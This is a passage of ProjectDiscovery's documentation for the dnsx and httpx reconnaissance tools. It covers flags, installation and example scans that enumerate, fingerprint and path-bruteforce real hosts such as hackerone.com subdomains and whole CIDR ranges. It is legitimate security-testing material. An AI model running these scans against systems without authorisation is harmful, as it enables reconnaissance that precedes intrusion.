	// Create DNS Resolver with default options
	dnsClient, err := dnsx.New(dnsx.DefaultOptions)
	if err != nil {
		fmt.Printf("err: %v\n", err)
		return
	}

	// Lookup sends a DNS A question and returns the corresponding IPs
	result, err := dnsClient.Lookup("hackerone.com")
	if err != nil {
		fmt.Printf("err: %v\n", err)
		return
	}
	for idx, msg := range result {
		fmt.Printf("%d: %s\n", idx+1, msg)
	}

	// QueryOne returns the raw DNS response for a single question
	rawResp, err := dnsClient.QueryOne("hackerone.com")
	if err != nil {
		fmt.Printf("err: %v\n", err)
		return
	}
	fmt.Printf("rawResp: %v\n", rawResp)

	jsonStr, err := rawResp.JSON()
	if err != nil {
		fmt.Printf("err: %v\n", err)
		return
	}
	fmt.Println(jsonStr)
}
```
# dnsx Usage
Learn dnsx usage including queries, filters, and configurations
## Access help
Use `dnsx -h` to display all of the help options.
## Help options
```console
INPUT:
-l, -list string list of sub(domains)/hosts to resolve (file or stdin)
-d, -domain string list of domain to bruteforce (file or comma separated or stdin)
-w, -wordlist string list of words to bruteforce (file or comma separated or stdin)
QUERY:
-a query A record (default)
-aaaa query AAAA record
-cname query CNAME record
-ns query NS record
-txt query TXT record
-srv query SRV record
-ptr query PTR record
-mx query MX record
-soa query SOA record
-axfr query AXFR
-caa query CAA record
-any query ANY record
FILTER:
-re, -resp display dns response
-ro, -resp-only display dns response only
-rc, -rcode string filter result by dns status code (eg. -rcode noerror,servfail,refused)
PROBE:
-cdn display cdn name
-asn display host asn information
RATE-LIMIT:
-t, -threads int number of concurrent threads to use (default 100)
-rl, -rate-limit int number of dns request/second to make (disabled as default) (default -1)
UPDATE:
-up, -update update dnsx to latest version
-duc, -disable-update-check disable automatic dnsx update check
OUTPUT:
-o, -output string file to write output
-j, -json write output in JSONL(ines) format
-omit-raw, -or omit raw dns response from jsonl output
DEBUG:
-hc, -health-check run diagnostic check up
-silent display only results in the output
-v, -verbose display verbose output
-raw, -debug display raw dns response
-stats display stats of the running scan
-version display version of dnsx
OPTIMIZATION:
-retry int number of dns attempts to make (must be at least 1) (default 2)
-hf, -hostsfile use system host file
-trace perform dns tracing
-trace-max-recursion int Max recursion for dns trace (default 32767)
-resume resume existing scan
-stream stream mode (wordlist, wildcard, stats and stop/resume will be disabled)
CONFIGURATIONS:
-r, -resolver string list of resolvers to use (file or comma separated)
-wt, -wildcard-threshold int wildcard filter threshold (default 5)
-wd, -wildcard-domain string domain name for wildcard filtering (other flags will be ignored)
```
## Notes on usage
* By default, `dnsx` checks for the **A** record.
* By default, `dnsx` uses Google, Cloudflare, and Quad9 [resolvers](https://github.com/projectdiscovery/dnsx/blob/43af78839e237ea8cbafe571df1ab0d6cbe7f445/libs/dnsx/dnsx.go#L31).
* A custom resolver list can be loaded using the `-r` flag (see the example after this list).
* Domain name input (`-wd`) is mandatory for wildcard elimination.
* The DNS record flag cannot be used when using wildcard filtering.
* DNS resolution (`-l`) and DNS brute-forcing (`-w`) can't be used together.
* VPN operators tend to filter high DNS/UDP traffic, so the tool might experience packet loss (e.g. [Mullvad VPN](https://github.com/projectdiscovery/dnsx/issues/221))
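For example, resolvers can be passed as a comma-separated list (or a file) via the `-r` flag:
```bash
# Resolve through specific resolvers instead of the defaults
subfinder -silent -d hackerone.com | dnsx -silent -r 1.1.1.1,8.8.8.8
```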
`dnsx` is made with 🖤 by the [projectdiscovery](https://projectdiscovery.io) team.
# Installing httpx
Learn about how to install and get started with httpx
Enter the command below in a terminal to install ProjectDiscovery's httpx using Go.
```bash
go install -v github.com/projectdiscovery/httpx/cmd/httpx@latest
```
```bash
brew install httpx
```
Supported in **macOS** (or Linux)
```bash
docker pull projectdiscovery/httpx:latest
```
Enter the commands below in a terminal to install ProjectDiscovery's httpx using GitHub.
```bash
git clone https://github.com/projectdiscovery/httpx.git; \
cd httpx/cmd/httpx; \
go build; \
mv httpx /usr/local/bin/; \
httpx -version;
```
```bash
https://github.com/projectdiscovery/httpx/releases
```
* Download the latest binary for your OS.
* Unzip the ready to run binary.
## Installation Notes
* httpx requires the latest version of [**Go**](https://go.dev/doc/install)
* Add the Go bin path to the system paths. On OSX or Linux, in your terminal use
```
echo export PATH=$PATH:$HOME/go/bin >> $HOME/.bashrc
source $HOME/.bashrc
```
* To add the Go bin path in Windows, [click this link for instructions.](https://www.architectryan.com/2018/03/17/add-to-the-path-on-windows-10/)
* The binary will be located in `$HOME/go/bin/httpx`
# httpx Overview
An HTTP toolkit that probes services, web servers, and other valuable metadata
## What is **httpx?**
httpx is a fast and multi-purpose HTTP toolkit built to support running multiple probes using a public library.
Probes are specific tests or checks to gather information about web servers, URLs, or other HTTP elements.
Httpx is designed to maintain result reliability with an increased number of threads.
Typically, users employ httpx to efficiently identify and analyze web server configurations, verify HTTP responses, and diagnose potential vulnerabilities or misconfigurations.
It can also be used in a pipeline that transitions from asset identification to technology enrichment and then feeds into detection of vulnerabilities, as sketched below.
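A minimal sketch of such a pipeline, combining tools shown elsewhere in these docs (`example.com` is a placeholder target):
```bash
# Discover subdomains, probe for live HTTP services, then scan them
subfinder -silent -d example.com | httpx -silent | nuclei -silent
```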
## Features and capabilities
* A simple and modular code base for easy contribution
* Configurable flags to probe multiple elements
* Support for multiple HTTP based probes
* Smart auto-fallback from https to http
* Support for hosts, URLs and CIDR
* Handling for edge cases: retries, backoffs for WAFs
* UI Dashboard for results
## Additional httpx resources
As an open source tool with a robust community there are a lot of community-created resources available.
We are happy to share those to offer even more information about our tools.
ProjectDiscovery's httpx should not be confused with the httpx Python library. Sharing these resources **is not formal approval or a recommendation** from ProjectDiscovery.
We cannot provide an endorsement of accuracy or validation that content is up-to-date. Anything shared here should be approached with caution.
* [https://www.kali.org/tools/httpx-toolkit/](https://www.kali.org/tools/httpx-toolkit/)
* [https://www.hackingarticles.in/a-detailed-guide-on-httpx/](https://www.hackingarticles.in/a-detailed-guide-on-httpx/)
## Support
Questions about using httpx? Issues working through installation? Cool story or use case you want to share? Get in touch!
Check out the [Help](/help) section of the docs or reach out to us on [Discord](https://discord.com/invite/projectdiscovery).
# Running httpx
Learn about running httpx with examples including commands and output
For all of the flags and options available for `httpx` be sure to check out the [Usage](/tools/httpx/usage) page. On this page we'll share examples running httpx with specific flags and goals
and the output you can expect from each.
If you have questions, reach out to us through [Help](/help).
## Basic Examples
### ASN Fingerprint
Use `httpx` with the `-asn` flag for ASN (Autonomous System Number) fingerprinting, an effective technique for mapping the network affiliations of various domains.
```
subfinder -d hackerone.com -silent | httpx -asn
__ __ __ _ __
/ /_ / /_/ /_____ | |/ /
/ __ \/ __/ __/ __ \| /
/ / / / /_/ /_/ /_/ / |
/_/ /_/\__/\__/ .___/_/|_|
/_/ v1.2.1
projectdiscovery.io
Use with caution. You are responsible for your actions.
Developers assume no liability and are not responsible for any misuse or damage.
https://mta-sts.managed.hackerone.com [AS54113, FASTLY, US]
https://gslink.hackerone.com [AS16509, AMAZON-02, US]
https://www.hackerone.com [AS13335, CLOUDFLARENET, US]
https://mta-sts.forwarding.hackerone.com [AS54113, FASTLY, US]
https://resources.hackerone.com [AS16509, AMAZON-02, US]
https://support.hackerone.com [AS13335, CLOUDFLARENET, US]
https://mta-sts.hackerone.com [AS54113, FASTLY, US]
https://docs.hackerone.com [AS54113, FASTLY, US]
https://api.hackerone.com [AS13335, CLOUDFLARENET, US]
```
### ASN Input
Specify an [autonomous system's number (ASN)](https://en.wikipedia.org/wiki/Autonomous_system_\(Internet\)) and `httpx` will fetch all IP addresses of that autonomous system and probe them.
```
echo AS14421 | httpx -silent
https://216.101.17.248
https://216.101.17.249
https://216.101.17.250
https://216.101.17.251
https://216.101.17.252
```
### CIDR Input
Run `httpx` with CIDR input (for example 173.0.84.0/24)
```
echo 173.0.84.0/24 | httpx -silent
https://173.0.84.29
https://173.0.84.43
https://173.0.84.31
https://173.0.84.44
https://173.0.84.12
https://173.0.84.4
https://173.0.84.36
https://173.0.84.45
https://173.0.84.14
https://173.0.84.25
https://173.0.84.46
https://173.0.84.24
https://173.0.84.32
https://173.0.84.9
https://173.0.84.13
https://173.0.84.6
https://173.0.84.16
https://173.0.84.34
```
### Docker Run
Use Docker to run `httpx` in an isolated container. For example, by piping subdomain lists into the Docker container, you can seamlessly perform probing across multiple targets, harnessing the power of `httpx` without direct installation requirements.
```
cat sub_domains.txt | docker run -i projectdiscovery/httpx
__ __ __ _ __
/ /_ / /_/ /_____ | |/ /
/ __ \/ __/ __/ __ \| /
/ / / / /_/ /_/ /_/ / |
/_/ /_/\__/\__/ .___/_/|_|
/_/ v1.1.2
projectdiscovery.io
Use with caution. You are responsible for your actions
Developers assume no liability and are not responsible for any misuse or damage.
https://mta-sts.forwarding.hackerone.com
https://mta-sts.hackerone.com
https://mta-sts.managed.hackerone.com
https://www.hackerone.com
https://api.hackerone.com
https://gslink.hackerone.com
https://resources.hackerone.com
https://docs.hackerone.com
https://support.hackerone.com
```
### Error Page Classifier and Filtering
The Error Page Classifier and Filtering feature aims to add intelligence to `httpx` by enabling `httpx` to classify and filter out common error pages returned by web applications.
It is an enhancement geared towards reducing noise and helping focus on actual results.
Using the `-fep` or `-filter-error-page` option filters out detected error pages and records them in the file `filtered_error_page.json` in JSON Lines format.
```
httpx -l urls.txt -path /v1/api -fep
__ __ __ _ __
/ /_ / /_/ /_____ | |/ /
/ __ \/ __/ __/ __ \| /
/ / / / /_/ /_/ /_/ / |
/_/ /_/\__/\__/ .___/_/|_|
/_/
projectdiscovery.io
[INF] Current httpx version v1.3.3 (latest)
https://scanme.sh/v1/api
```
### Favicon Hash
Extract and display the mmh3 hash of the '/favicon.ico' file from the given targets.
```
subfinder -d hackerone.com -silent | httpx -favicon
__ __ __ _ __
/ /_ / /_/ /_____ | |/ /
/ __ \/ __/ __/ __ \| /
/ / / / /_/ /_/ /_/ / |
/_/ /_/\__/\__/ .___/_/|_|
/_/ v1.1.5
projectdiscovery.io
Use with caution. You are responsible for your actions.
Developers assume no liability and are not responsible for any misuse or damage.
https://docs.hackerone.com/favicon.ico [595148549]
https://hackerone.com/favicon.ico [595148549]
https://mta-sts.managed.hackerone.com/favicon.ico [-1700323260]
https://mta-sts.forwarding.hackerone.com/favicon.ico [-1700323260]
https://support.hackerone.com/favicon.ico [-1279294674]
https://gslink.hackerone.com/favicon.ico [1506877856]
https://resources.hackerone.com/favicon.ico [-1840324437]
https://api.hackerone.com/favicon.ico [566218143]
https://mta-sts.hackerone.com/favicon.ico [-1700323260]
https://www.hackerone.com/favicon.ico [778073381]
```
### File/Path Bruteforce
Use `httpx` with the `-path` option for efficient File/Path Bruteforcing. This feature allows probing specific paths across multiple URLs, uncovering response codes and revealing potentially vulnerable or unsecured endpoints in web applications.
```
httpx -l urls.txt -path /v1/api -sc
__ __ __ _ __
/ /_ / /_/ /_____ | |/ /
/ __ \/ __/ __/ __ \| /
/ / / / /_/ /_/ /_/ / |
/_/ /_/\__/\__/ .___/_/|_|
/_/ v1.1.5
projectdiscovery.io
Use with caution. You are responsible for your actions.
Developers assume no liability and are not responsible for any misuse or damage.
https://mta-sts.managed.hackerone.com/v1/api [404]
https://mta-sts.hackerone.com/v1/api [404]
https://mta-sts.forwarding.hackerone.com/v1/api [404]
https://docs.hackerone.com/v1/api [404]
https://api.hackerone.com/v1/api [401]
https://hackerone.com/v1/api [302]
https://support.hackerone.com/v1/api [404]
https://resources.hackerone.com/v1/api [301]
https://gslink.hackerone.com/v1/api [404]
http://www.hackerone.com/v1/api [301]
```
### File Input
Run `httpx` with the `-probe` flag against all the hosts in hosts.txt to return URLs with probed status.
```
httpx -list hosts.txt -silent -probe
http://ns.hackerone.com [FAILED]
https://docs.hackerone.com [SUCCESS]
https://mta-sts.hackerone.com [SUCCESS]
https://mta-sts.managed.hackerone.com [SUCCESS]
http://email.hackerone.com [FAILED]
https://mta-sts.forwarding.hackerone.com [SUCCESS]
http://links.hackerone.com [FAILED]
https://api.hackerone.com [SUCCESS]
https://www.hackerone.com [SUCCESS]
http://events.hackerone.com [FAILED]
https://support.hackerone.com [SUCCESS]
https://gslink.hackerone.com [SUCCESS]
http://o1.email.hackerone.com [FAILED]
http://info.hackerone.com [FAILED]
https://resources.hackerone.com [SUCCESS]
http://o2.email.hackerone.com [FAILED]
http://o3.email.hackerone.com [FAILED]
http://go.hackerone.com [FAILED]
http://a.ns.hackerone.com [FAILED]
http://b.ns.hackerone.com [FAILED]
```
### JARM Fingerprint
Use `httpx` with the `-jarm` flag to leverage JARM fingerprinting, a specialized tool for active TLS server fingerprinting.
This approach enables the identification and categorization of servers based on their TLS configurations, making it an effective method for detecting and analyzing diverse internet servers,
including potential security threats.
```
subfinder -d hackerone.com -silent | httpx -jarm
__ __ __ _ __
/ /_ / /_/ /_____ | |/ /
/ __ \/ __/ __/ __ \| /
/ / / / /_/ /_/ /_/ / |
/_/ /_/\__/\__/ .___/_/|_|
/_/ v1.2.1
projectdiscovery.io
Use with caution. You are responsible for your actions.
Developers assume no liability and are not responsible for any misuse or damage.
https://www.hackerone.com [29d3dd00029d29d00042d43d00041d5de67cc9954cc85372523050f20b5007]
https://mta-sts.hackerone.com [29d29d00029d29d00042d43d00041d2aa5ce6a70de7ba95aef77a77b00a0af]
https://mta-sts.managed.hackerone.com [29d29d00029d29d00042d43d00041d2aa5ce6a70de7ba95aef77a77b00a0af]
https://docs.hackerone.com [29d29d00029d29d00042d43d00041d2aa5ce6a70de7ba95aef77a77b00a0af]
https://support.hackerone.com [29d3dd00029d29d00029d3dd29d29d5a74e95248e58a6162e37847a24849f7]
https://api.hackerone.com [29d3dd00029d29d00042d43d00041d5de67cc9954cc85372523050f20b5007]
https://mta-sts.forwarding.hackerone.com [29d29d00029d29d00042d43d00041d2aa5ce6a70de7ba95aef77a77b00a0af]
https://resources.hackerone.com [2ad2ad0002ad2ad0002ad2ad2ad2ad043bfbd87c13813505a1b60adf4f6ff5]
```
### Tool Chain
Combining `httpx` with other tools like `subfinder` can elevate your web reconnaissance.
For example, pipe results from `subfinder` directly into `httpx` to efficiently identify active web servers and their technologies across various subdomains of a given target.
```
subfinder -d hackerone.com -silent | httpx -title -tech-detect -status-code
__ __ __ _ __
/ /_ / /_/ /_____ | |/ /
/ __ \/ __/ __/ __ \| /
/ / / / /_/ /_/ /_/ / |
/_/ /_/\__/\__/ .___/_/|_|
/_/ v1.1.1
projectdiscovery.io
Use with caution. You are responsible for your actions
Developers assume no liability and are not responsible for any misuse or damage.
https://mta-sts.managed.hackerone.com [404] [Page not found · GitHub Pages] [Varnish,GitHub Pages,Ruby on Rails]
https://mta-sts.hackerone.com [404] [Page not found · GitHub Pages] [Varnish,GitHub Pages,Ruby on Rails]
https://mta-sts.forwarding.hackerone.com [404] [Page not found · GitHub Pages] [GitHub Pages,Ruby on Rails,Varnish]
https://docs.hackerone.com [200] [HackerOne Platform Documentation] [Ruby on Rails,jsDelivr,Gatsby,React,webpack,Varnish,GitHub Pages]
https://support.hackerone.com [301,302,301,200] [HackerOne] [Cloudflare,Ruby on Rails,Ruby]
https://resources.hackerone.com [301,301,404] [Sorry, no Folders found.]
```
### URL probe
Run `httpx` against all the hosts and subdomains in hosts.txt to return URLs running an HTTP webserver.
```
cat hosts.txt | httpx
__ __ __ _ __
/ /_ / /_/ /_____ | |/ /
/ __ \/ __/ __/ __ \| /
/ / / / /_/ /_/ /_/ / |
/_/ /_/\__/\__/ .___/_/|_| v1.1.1
/_/
projectdiscovery.io
[WRN] Use with caution. You are responsible for your actions
[WRN] Developers assume no liability and are not responsible for any misuse or damage.
https://mta-sts.managed.hackerone.com
https://mta-sts.hackerone.com
https://mta-sts.forwarding.hackerone.com
https://docs.hackerone.com
https://www.hackerone.com
https://resources.hackerone.com
https://api.hackerone.com
https://support.hackerone.com
```
## UI Dashboard (PDCP Integration)
#### Configure API Key
To upload your assets to PDCP, you will need to create a free API key.
* **Obtain API Key:**
* Visit [https://cloud.projectdiscovery.io](https://cloud.projectdiscovery.io)
* Open the settings menu from the top right and select "API Key" to create your API key
* Use the `httpx -auth` command, and enter your API key when prompted.
#### Configure Team (Optional)
If you want to upload the asset results to a team workspace instead of your personal workspace, you can configure the Team ID. You can use either the CLI option or the environment variable, depending on your preference.
* **Obtain Team ID:**
* To obtain your Team ID, navigate to [https://cloud.projectdiscovery.io/settings/team](https://cloud.projectdiscovery.io/settings/team) and copy the Team ID from the top right section.
![image](https://github.com/user-attachments/assets/76a9f102-1626-4c87-8d9e-37c30417f19e)
* **CLI Option:**
* Use the `-tid` or `-team-id` option to specify the team ID.
* Example: `httpx -tid XXXXXX -dashboard`
* **ENV Variable:**
* Set the `PDCP_TEAM_ID` environment variable to your team ID.
* Example: `export PDCP_TEAM_ID=XXXXX`
Either of these options is sufficient to configure the Team ID.
#### Run httpx with UI Dashboard
To run `httpx` and upload the results to the UI Dashboard:
```console
$ chaos -d hackerone.com | httpx -dashboard
__ __ __ _ __
/ /_ / /_/ /_____ | |/ /
/ __ \/ __/ __/ __ \| /
/ / / / /_/ /_/ /_/ / |
/_/ /_/\__/\__/ .___/_/|_|
/_/
projectdiscovery.io
[INF] Current httpx version v1.6.6 (latest)
[INF] To view results on UI dashboard, visit https://cloud.projectdiscovery.io/assets upon completion.
http://a.ns.hackerone.com
https://www.hackerone.com
http://b.ns.hackerone.com
https://api.hackerone.com
https://mta-sts.forwarding.hackerone.com
https://docs.hackerone.com
https://support.hackerone.com
https://mta-sts.hackerone.com
https://gslink.hackerone.com
[INF] Found 10 results, View found results in dashboard : https://cloud.projectdiscovery.io/assets/cqd56lebh6us73bi22pg
```
![image](https://blog.projectdiscovery.io/content/images/size/w1600/2024/08/image.png)
#### Uploading to an Existing Asset Group
To upload new assets to an existing asset group:
```console
$ chaos -d hackerone.com | httpx -dashboard -aid existing-asset-id
```
#### Setting an Asset Group Name
To set a custom asset group name:
```console
$ chaos -d hackerone.com | httpx -dashboard -aname "Custom Asset Group"
```
### Additional upload options
* `-pd, -dashboard`: Enable uploading of `httpx` results to the ProjectDiscovery Cloud (PDCP) UI Dashboard.
* `-aid, -asset-id string`: Upload new assets to an existing asset ID (optional).
* `-aname, -asset-name string`: Set the asset group name (optional).
* `-pdu, -dashboard-upload string`: Upload `httpx` output file (jsonl) to the ProjectDiscovery Cloud (PDCP) UI Dashboard.
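As a minimal sketch of the `-pdu` workflow (file names are illustrative), results can be written locally in JSONL format first and uploaded afterwards:
```bash
# Write results as JSONL, then upload the file to the dashboard
httpx -l hosts.txt -json -o results.jsonl
httpx -dashboard-upload results.jsonl
```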
### Environment Variables
* `export ENABLE_CLOUD_UPLOAD=true`: Enable dashboard upload by default.
* `export DISABLE_CLOUD_UPLOAD_WARN=true`: Disable dashboard warning.
* `export PDCP_TEAM_ID=XXXXX`: Set the team ID for the ProjectDiscovery Cloud Platform.
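For instance, uploads can be configured entirely through environment variables (a sketch; the team ID value is a placeholder):
```bash
# Enable dashboard upload by default and target a team workspace
export ENABLE_CLOUD_UPLOAD=true
export PDCP_TEAM_ID=XXXXX
cat hosts.txt | httpx -silent
```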
## Expanded Examples
### Using httpx as a library
httpx can be used as a library by creating an instance of the Options struct and populating it with the same options that would be specified via the CLI.
Once validated, the struct should be passed to a runner instance (to be closed at the end of the program), and the RunEnumeration method should be called.
* A basic example of how to use httpx as a library is available in the [GitHub examples](https://github.com/projectdiscovery/httpx/tree/main/examples) folder.
### Using httpx screenshot
httpx includes support for taking screenshots with the `-screenshot` flag, which gives users the ability to capture screenshots of target URLs, pages, or endpoints along with the rendered DOM.
This functionality enables a comprehensive view of the target's visual content.
The rendered DOM body is also included in the JSON line output when the `-screenshot` option is used with the `-json` option.
To use this feature, add the `-screenshot` flag to the `httpx` command.
`httpx -screenshot -u https://example.com`
Screenshots are captured using a headless browser, so `httpx` will be slower when the `-screenshot` option is used.
#### Domain, Subdomain, and Path Support
The `-screenshot` option is versatile and can be used to capture screenshots for domains, subdomains, and even specific paths when used in conjunction with the `-path` option:
```
httpx -screenshot -u example.com
httpx -screenshot -u https://example.com/login
httpx -screenshot -path fuzz_path.txt -u https://example.com
```
#### Using with Other Tools
In the example below we're piping subfinder output into `httpx` with the screenshot option.
```
subfinder -d example.com | httpx -screenshot
```
#### System Chrome Support
By default, `httpx` uses the go-rod library to install and manage Chrome for taking screenshots.
However, if you prefer to use your locally installed system Chrome, add the `-system-chrome` flag:
```
httpx -screenshot -system-chrome -u https://example.com
```
#### Output Directory
Screenshots are stored in the output/screenshot directory by default. To specify a custom output directory, use the `-srd` option:
```
httpx -screenshot -srd /path/to/custom/directory -u https://example.com
```
#### Body Preview
Body preview shows the first N characters of the response and can strip HTML tags from the output.
```
httpx -u https://example.com -silent -body-preview
https://example.com [Example Domain This domain is for use in illustrative examples in documents. You may use this domai]
```
```
httpx -u https://example.com -silent -body-preview=200 -strip=html
https://example.com [Example Domain This domain is for use in illustrative examples in documents. You may use this domain in literature without prior coordination or asking for permission. More information...]
```
# httpx Usage
Learn httpx usage including flags, probes, and options
## Access help
Use `httpx -h` to display all help options.
## httpx help options
```
Flags:
INPUT:
-l, -list string input file containing list of hosts to process
-rr, -request string file containing raw request
-u, -target string[] input target host(s) to probe
PROBES:
-sc, -status-code display response status-code
-cl, -content-length display response content-length
-ct, -content-type display response content-type
-location display response redirect location
-favicon display mmh3 hash for '/favicon.ico' file
-hash string display response body hash (supported: md5,mmh3,simhash,sha1,sha256,sha512)
-jarm display jarm fingerprint hash
-rt, -response-time display response time
-lc, -line-count display response body line count
-wc, -word-count display response body word count
-title display page title
-bp, -body-preview display first N characters of response body (default 100)
-server, -web-server display server name
-td, -tech-detect display technology in use based on wappalyzer dataset
-method display http request method
-websocket display server using websocket
-ip display host ip
-cname display host cname
-asn display host asn information
-cdn display cdn/waf in use
-probe display probe status
HEADLESS:
-ss, -screenshot enable saving screenshot of the page using headless browser
-system-chrome enable using local installed chrome for screenshot
-esb, -exclude-screenshot-bytes enable excluding screenshot bytes from json output
-ehb, -exclude-headless-body enable excluding headless body from json output
MATCHERS:
-mc, -match-code string match response with specified status code (-mc 200,302)
-ml, -match-length string match response with specified content length (-ml 100,102)
-mlc, -match-line-count string match response body with specified line count (-mlc 423,532)
-mwc, -match-word-count string match response body with specified word count (-mwc 43,55)
-mfc, -match-favicon string[] match response with specified favicon hash (-mfc 1494302000)
-ms, -match-string string match response with specified string (-ms admin)
-mr, -match-regex string match response with specified regex (-mr admin)
-mcdn, -match-cdn string[] match host with specified cdn provider (cloudfront, fastly, google, leaseweb, stackpath)
-mrt, -match-response-time string match response with specified response time in seconds (-mrt '< 1')
-mdc, -match-condition string match response with dsl expression condition
EXTRACTOR:
-er, -extract-regex string[] display response content with matched regex
-ep, -extract-preset string[] display response content matched by a pre-defined regex (ipv4,mail,url)
FILTERS:
-fc, -filter-code string filter response with specified status code (-fc 403,401)
-fep, -filter-error-page filter response with ML based error page detection
-fl, -filter-length string filter response with specified content length (-fl 23,33)
-flc, -filter-line-count string filter response body with specified line count (-flc 423,532)
-fwc, -filter-word-count string filter response body with specified word count (-fwc 423,532)
-ffc, -filter-favicon string[] filter response with specified favicon hash (-ffc 1494302000)
-fs, -filter-string string filter response with specified string (-fs admin)
-fe, -filter-regex string filter response with specified regex (-fe admin)
-fcdn, -filter-cdn string[] filter host with specified cdn provider (cloudfront, fastly, google, leaseweb, stackpath)
-frt, -filter-response-time string filter response with specified response time in seconds (-frt '> 1')
-fdc, -filter-condition string filter response with dsl expression condition
-strip strips all tags in response. supported formats: html,xml (default html)
RATE-LIMIT:
-t, -threads int number of threads to use (default 50)
-rl, -rate-limit int maximum requests to send per second (default 150)
-rlm, -rate-limit-minute int maximum number of requests to send per minute
MISCELLANEOUS:
-pa, -probe-all-ips probe all the ips associated with same host
-p, -ports string[] ports to probe (nmap syntax: eg http:1,2-10,11,https:80)
-path string path or list of paths to probe (comma-separated, file)
-tls-probe send http probes on the extracted TLS domains (dns_name)
-csp-probe send http probes on the extracted CSP domains
-tls-grab perform TLS(SSL) data grabbing
-pipeline probe and display server supporting HTTP1.1 pipeline
-http2 probe and display server supporting HTTP2
-vhost probe and display server supporting VHOST
-ldv, -list-dsl-variables list json output field keys name that support dsl matcher/filter
UPDATE:
-up, -update update httpx to latest version
-duc, -disable-update-check disable automatic httpx update check
OUTPUT:
-o, -output string file to write output results
-oa, -output-all filename to write output results in all formats
-sr, -store-response store http response to output directory
-srd, -store-response-dir string store http response to custom directory
-csv store output in csv format
-csvo, -csv-output-encoding string define output encoding
-j, -json store output in JSONL(ines) format
-irh, -include-response-header include http response (headers) in JSON output (-json only)
-irr, -include-response include http request/response (headers + body) in JSON output (-json only)
-irrb, -include-response-base64 include base64 encoded http request/response in JSON output (-json only)
-include-chain include redirect http chain in JSON output (-json only)
-store-chain include http redirect chain in responses (-sr only)
-svrc, -store-vision-recon-cluster include visual recon clusters (-ss and -sr only)
CONFIGURATIONS:
-config string path to the httpx configuration file (default $HOME/.config/httpx/config.yaml)
-r, -resolvers string[] list of custom resolver (file or comma separated)
-allow string[] allowed list of IP/CIDR's to process (file or comma separated)
-deny string[] denied list of IP/CIDR's to process (file or comma separated)
-sni, -sni-name string custom TLS SNI name
-random-agent enable Random User-Agent to use (default true)
-H, -header string[] custom http headers to send with request
-http-proxy, -proxy string http proxy to use (eg http://127.0.0.1:8080)
-unsafe send raw requests skipping golang normalization
-resume resume scan using resume.cfg
-fr, -follow-redirects follow http redirects
-maxr, -max-redirects int max number of redirects to follow per host (default 10)
-fhr, -follow-host-redirects follow redirects on the same host
-rhsts, -respect-hsts respect HSTS response headers for redirect requests
-vhost-input get a list of vhosts as input
-x string request methods to probe, use 'all' to probe all HTTP methods
-body string post body to include in http request
-s, -stream stream mode - start elaborating input targets without sorting
-sd, -skip-dedupe disable dedupe input items (only used with stream mode)
-ldp, -leave-default-ports leave default http/https ports in host header (eg. http://host:80 - https://host:443)
-ztls use ztls library with autofallback to standard one for tls13
-no-decode avoid decoding body
-tlsi, -tls-impersonate enable experimental client hello (ja3) tls randomization
-no-stdin Disable Stdin processing
DEBUG:
-health-check, -hc run diagnostic check up
-debug display request/response content in cli
-debug-req display request content in cli
-debug-resp display response content in cli
-version display httpx version
-stats display scan statistic
-profile-mem string optional httpx memory profile dump file
-silent silent mode
-v, -verbose verbose mode
-si, -stats-interval int number of seconds to wait between showing a statistics update (default: 5)
-nc, -no-color disable colors in cli output
OPTIMIZATIONS:
-nf, -no-fallback display both probed protocol (HTTPS and HTTP)
-nfs, -no-fallback-scheme probe with protocol scheme specified in input
-maxhr, -max-host-error int max error count per host before skipping remaining path/s (default 30)
-ec, -exclude-cdn skip full port scans for CDN/WAF (only checks for 80,443)
-retries int number of retries
-timeout int timeout in seconds (default 10)
-delay value duration between each http request (eg: 200ms, 1s) (default -1ns)
-rsts, -response-size-to-save int max response size to save in bytes (default 2147483647)
-rstr, -response-size-to-read int max response size to read in bytes (default 2147483647)
```
## Notes on usage
* By default, an `httpx` probe with an HTTPS scheme will fall back to HTTP only if HTTPS is not reachable.
* The `-no-fallback` flag can be used to probe and display both HTTP and HTTPS results.
* A custom scheme for ports can be defined, for example `-ports http:443,http:80,https:8443`
* Custom resolvers support multiple protocols (doh|tcp|udp) in the form protocol:resolver:port (for example `udp:127.0.0.1:53`)
* The following flags should be used for specific use cases instead of running them as default with other probes (see the example below this list):
* `-ports`
* `-path`
* `-vhost`
* `-screenshot`
* `-csp-probe`
* `-tls-probe`
* `-favicon`
* `-http2`
* `-pipeline`
* `-tls-impersonate`
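A short illustration of these notes, combining a custom port scheme with a custom resolver (the values are examples only):
```bash
# Probe both schemes, define per-port schemes,
# and use a custom UDP resolver in protocol:resolver:port form
httpx -l hosts.txt -no-fallback -ports http:8080,https:8443 -r udp:127.0.0.1:53
```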
# Open Source Tools
Learn about ProjectDiscovery's Open Source Tools
Let's delve into the specifics of each category and its corresponding tools.
## Discover
In the discovery phase, the goal is to map out the target's entire online presence, finding subdomains, open ports, and other valuable endpoints. The tools in this category are instrumental in revealing a comprehensive view of the target's landscape. This stage includes tools like:
* **Subfinder**: A robust tool focused on passive subdomain enumeration, providing a holistic view of a target's online assets.
* **Cloudlist**: A comprehensive tool for enumerating assets across multiple cloud providers, ensuring visibility into the cloud-based infrastructure of your target.
* **Naabu**: A lightning-fast port scanner designed to swiftly identify open ports on target hosts, ensuring no potential entry point is overlooked.
* **Katana**: A next-generation web crawling framework designed to navigate and parse web content efficiently, revealing hidden details of web assets.
* **Chaos**: Offering an internet-wide asset data source, Chaos is crucial for expanding the scope of your asset discovery efforts.
* **Uncover**: Designed to search and highlight exposed hosts across various APIs, ensuring that no stone is left unturned in the discovery phase.
* **ASNmap**: Quickly map an organization's network ranges using autonomous system number (ASN) information.
* **Alterx**: Fast and customizable subdomain wordlist generator using DSL.
* **Shuffledns**: A massDNS wrapper to bruteforce and resolve subdomains with wildcard handling support.
## Enrich
Once assets are discovered, the next step is to enrich the gathered data. This phase involves understanding the nature of the assets, the technologies behind them, and their exposure level. This stage includes tools like:
* **httpx**: An essential HTTP toolkit that probes services, identifying crucial details about web servers, status codes, and other valuable metadata.
* **dnsx**: A versatile DNS toolkit that allows for efficient operations such as mass DNS resolutions, wildcard testing, and more.
* **tlsx**: Specialized for TLS-based data collection, tlsx offers insights into certificates, cipher suites, and other SSL/TLS details of a target.
## Detect
With the landscape mapped and details enriched, the next phase is detection. Here, the aim is to pinpoint exploitable vulnerabilities, ensuring a thorough risk assessment. This stage includes tools like:
* **Nuclei**: A vulnerability scanner designed to identify exploitable weaknesses in the attack surface, with a vast library of templates for various known vulnerabilities.
* **Interactsh**: An out-of-band (OOB) interaction gathering library, essential for identifying vulnerabilities that may not be immediately evident through conventional scanning methods.
